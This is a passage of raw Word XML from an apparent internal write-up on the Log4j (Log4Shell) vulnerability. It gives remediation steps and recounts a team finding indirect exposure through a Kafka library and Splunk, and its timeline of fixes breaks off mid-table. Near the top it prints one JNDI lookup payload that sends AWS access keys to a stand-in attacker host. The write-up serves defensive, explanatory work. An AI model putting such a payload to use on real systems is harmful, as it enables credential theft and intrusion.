          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the following search phrase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005A03C3">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667B0294" w14:textId="05A8C943" w:rsidR="005A03C3" w:rsidRDefault="00520D63" w:rsidP="00C31F28">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>jndi:ldap://evil.attack:9999/</w:t>
      </w:r>
      <w:r w:rsidR="00CA6C22" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA6C22" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>{env:AWS_ACCESS_KEY_ID}/${AWS_SECRET_ACCESS_KEY}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00E53334" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DC836" w14:textId="3AC08C04" w:rsidR="00E53334" w:rsidRDefault="00F10AFB" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F10AFB">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Java runtime will resolve this in this instance since this access key and the secret access key resolve this URL and make a call even though it doesn't trust. This presents a severe issue because hackers will now have access to access keys</w:t>
      </w:r>
      <w:r w:rsidR="00C31F28">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DC576" w14:textId="0F510F02" w:rsidR="00C31F28" w:rsidRDefault="0006235C" w:rsidP="0006235C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006235C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r w:rsidR="00680746" w:rsidRPr="0006235C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B97D78" w14:textId="6280078B" w:rsidR="00B74963" w:rsidRPr="00B74963" w:rsidRDefault="00B74963" w:rsidP="0006235C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74963">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>The steps that developers should take to eliminate this log4j vulnerability are listed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993E23A" w14:textId="070CEEA1" w:rsidR="00CF59D5" w:rsidRDefault="00CF59D5" w:rsidP="0018367B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF59D5">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B41CD" w14:textId="3B3DD5E6" w:rsidR="0018367B" w:rsidRPr="00CF59D5" w:rsidRDefault="0010447E" w:rsidP="0018367B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Gradle: use dependency constraints to restrict the dependency version – this will resolve the project </w:t>
      </w:r>
      <w:r w:rsidR="00E82A30">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>direct and indirect usage of log4j version</w:t>
      </w:r>
      <w:r w:rsidR="0006235C">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85C8B7" w14:textId="6AA17DF8" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="005D735E" w:rsidP="003A5E5B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc126224001"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Project Experience</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidR="003A5E5B" w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673721E1" w14:textId="2A4A6652" w:rsidR="00F23B08" w:rsidRPr="003A290F" w:rsidRDefault="0067686F" w:rsidP="00F23B08">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc126224002"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Is our system impacted?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="00F23B08" w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0DFBDD" w14:textId="7CEF19CE" w:rsidR="00310311" w:rsidRDefault="00646493" w:rsidP="00F23B08">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00646493">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Indeed, but only indirectly. Our application does not directly use Log4j, but the supporting library did, thus we raised a flag with the concern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">internal </w:t>
      </w:r>
      <w:r w:rsidRPr="00646493">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80A790" w14:textId="6D9DAA41" w:rsidR="0067686F" w:rsidRPr="003A290F" w:rsidRDefault="0067686F" w:rsidP="0067686F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc126224003"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>How we fixed it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C86F49" w14:textId="77777777" w:rsidR="00C43B4D" w:rsidRDefault="00C43B4D" w:rsidP="00C43B4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>After running a scan, our DevOps team found all the potential systems and informed each team as necessary. The manner we solved this problem is dramatic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B235611" w14:textId="77025A15" w:rsidR="00D07C93" w:rsidRDefault="00C43B4D" w:rsidP="00C43B4D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">When the flag was raised, we checked </w:t>
      </w:r>
      <w:r w:rsidR="00E81D25">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> our projects to confirm that there was no problem with our system, but the flag on our app remained unresolved. As a result, we conducted another diagnosis and discovered that our customised Kafka library is severely impacted because it has numerous configured lookups. We raised the </w:t>
      </w:r>
      <w:r w:rsidR="00A33342">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>flag; h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">owever, </w:t>
      </w:r>
      <w:r w:rsidR="00A33342">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">our internal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A33342">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>kafka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A33342">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev team</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> had already released the fix by that point, and we had added a patch on top of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE674FB" w14:textId="158D18EA" w:rsidR="00B44773" w:rsidRDefault="00623A68" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00623A68">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Devops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00623A68">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> continued to complain that only a few systems were still affected by the log4j vulnerability despite numerous corrections and patches. Then, in the war room, we identified that Splunk, a logging tool, also makes use of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00623A68">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>, following the final patch, the flag has been removed in all applications running on the client</w:t>
      </w:r>
      <w:r w:rsidR="00DC1861">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8DADB" w14:textId="77777777" w:rsidR="00255548" w:rsidRDefault="00255548" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00255548">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Despite </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00255548">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00255548">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> this internal strife, every time Log4j released a patch, a vulnerability was found in that patch, resulting in the release of a new one. This cycle repeated itself four times in a week.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C5C1FF" w14:textId="57E025F7" w:rsidR="00DC1861" w:rsidRDefault="00070AFF" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070AFF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">The lesson here is that for this kind of vulnerability scanning, developers should </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00070AFF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>take into account</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00070AFF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> not only their project but also any underlying dependencies. According to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00070AFF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>synk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00070AFF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> survey, log4j has a 39% direct impact </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>but the rest are all</w:t>
      </w:r>
      <w:r w:rsidRPr="00070AFF">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> indirect impact</w:t>
      </w:r>
      <w:r w:rsidR="004C29AB">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829F7D4" w14:textId="29DCFB2B" w:rsidR="004C29AB" w:rsidRDefault="00801AF8" w:rsidP="00623148">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="788946E4" wp14:editId="7A622946">
            <wp:extent cx="3032760" cy="176606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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3038754" cy="1769555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C6C4D" w14:textId="4CCE662B" w:rsidR="00801AF8" w:rsidRDefault="00801AF8" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25326D8B" w14:textId="0226E2C4" w:rsidR="00C4097E" w:rsidRDefault="00C4097E" w:rsidP="0067686F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Below is the </w:t>
      </w:r>
      <w:r w:rsidRPr="009720AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> of fixes,</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1536"/>
        <w:gridCol w:w="1404"/>
        <w:gridCol w:w="6302"/>
      </w:tblGrid>
      <w:tr w:rsidR="000974B4" w14:paraId="32474DAE" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5711DACF" w14:textId="71966CA0" w:rsidR="00B67B3A" w:rsidRDefault="00B67B3A" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>09-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00CA4255" w14:textId="755CAEDF" w:rsidR="00B67B3A" w:rsidRDefault="009A239E" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Zero-Day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63042D36" w14:textId="3269BA2F" w:rsidR="00B67B3A" w:rsidRDefault="009A239E" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Apache Log4j Zero-Day exploit discovered w</w:t>
            </w:r>
            <w:r w:rsidR="00BB1850">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>hich was rated 10 out of 10 on the CVSS vulnerability rating scale</w:t>
            </w:r>
            <w:r w:rsidR="00DA3A8F">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000974B4" w14:paraId="6BFD909A" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="150AEA0C" w14:textId="49815C0A" w:rsidR="00B67B3A" w:rsidRDefault="00DA3A8F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>10-Dec-2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B4B72A" w14:textId="77777777" w:rsidR="00774819" w:rsidRDefault="00774819" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="747BD69D" w14:textId="3687E86C" w:rsidR="0099629D" w:rsidRDefault="0099629D" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00774819">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>FRIDAY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4A24F4" w14:textId="5AF5B078" w:rsidR="00B67B3A" w:rsidRDefault="00DA3A8F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>UK NCSC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE52D09" w14:textId="167F1E64" w:rsidR="00B67B3A" w:rsidRDefault="00DA3A8F" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>UK NCSC Issues log4j warning to UK Organisations and it was publicly disclosed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF3156" w14:paraId="76EC882B" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61FBAC4C" w14:textId="55CD3BFD" w:rsidR="0094406E" w:rsidRDefault="0094406E" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>10-Dec-2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1404" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F0DBE3F" w14:textId="227B4813" w:rsidR="0094406E" w:rsidRDefault="0094406E" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6302" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33CD90E0" w14:textId="77777777" w:rsidR="0094406E" w:rsidRDefault="0094406E" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve">Released a patch </w:t>
            </w:r>
            <w:r w:rsidR="00174779">
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Log4j 2.15.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BF7BC45" w14:textId="77777777" w:rsidR="004F559B" w:rsidRDefault="004F559B" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1D483A2D" w14:textId="26303F87" w:rsidR="004F559B" w:rsidRDefault="004F559B" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2401DBF0" wp14:editId="35CAE266">
                  <wp:extent cx="3864610" cy="1209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0038" cy="1217092"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000974B4" w14:paraId="18936422" w14:textId="77777777" w:rsidTr="00EF3156">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EBED2C3" w14:textId="77777777" w:rsidR="00B67B3A" w:rsidRDefault="0099629D" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>13-Dec-2021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A15815" w14:textId="3E4A7543" w:rsidR="00774819" w:rsidRDefault="00774819" w:rsidP="0067686F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00774819">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>MONDAY</w:t>
            </w:r>
